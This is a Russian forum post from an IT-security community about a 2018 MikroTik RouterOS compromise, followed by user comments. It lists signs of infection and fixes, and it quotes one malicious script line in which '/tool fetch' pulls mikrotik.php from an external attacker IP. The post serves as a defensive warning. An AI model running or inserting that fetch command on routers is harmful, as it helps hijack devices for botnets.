Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

1
Автор поста оценил этот комментарий

Ояебу: и эти люди называют себя админами - выставили порт winbox в мир и удивляються! Есть много страшных слов которые вам бы не мешало выучить:
vpn
firewall

ipsec

ssh

А вообще новость в стиле последней (не вашей случаем) статьи "MacOS можно взломать!!!1111"
P.s. повеяло махровой ализарщиной с хабра ...

раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Пост написан для того чтобы предостеречь тех, кто оказался или может оказаться в похожей ситуации. А Вы я смотрю суперадмин, всегда всё делаете правильно? Хотя мне кажется Вы один из любителей подкинуть говно на вентилятор, мол все пидорасы, один Вы Д`Артаньян. Если кто не верит может зайти в профиль @xxxmentat, там два заминусованных поста и статистика минусов в профиле в четыре раза выше чем плюсов.

показать ответы
3
Автор поста оценил этот комментарий

Говорят, что помогает если подключить модем через юсб хаб с собственным питанием. Но это конечно так себе решение если модем висанёт.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Зачем? Микротик давно уже умеет сам питалово на усб передёргивать.

В том числе можно написать скрипт - нет интернета - передерни модем.

2
Автор поста оценил этот комментарий

у меня филиалы на микротиках, тока меня дыры не коснулись, потому что  нормально настроен firewall

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Давайте выкладывать настройки фаерволла и обсуждать, а то каждый думает что он нормально настроен, а по итогу....

показать ответы
3
Автор поста оценил этот комментарий
микротик устранил эту уязвимость что-то около года назад вроде. тут попали те, кто не часто обновляется
раскрыть ветку (1)
Автор поста оценил этот комментарий

Найдена уязвимость в апреле, а устранена около года назад. Вы ничего не путаете? Или пост читали через слово?

показать ответы
Автор поста оценил этот комментарий

лучше скажите когда сделают по умолчанию закрытый доступ извне по 53 порту?

раскрыть ветку (1)
Автор поста оценил этот комментарий

Х.з. Я фаерволом тушу.

2
Автор поста оценил этот комментарий
Кстати IP американский
показать ответы
Автор поста оценил этот комментарий

Поймал... спс за инфу

Иллюстрация к комментарию
раскрыть ветку (1)
Автор поста оценил этот комментарий

Судя по количеству запусков как раз в одно и то же время со мной поймал.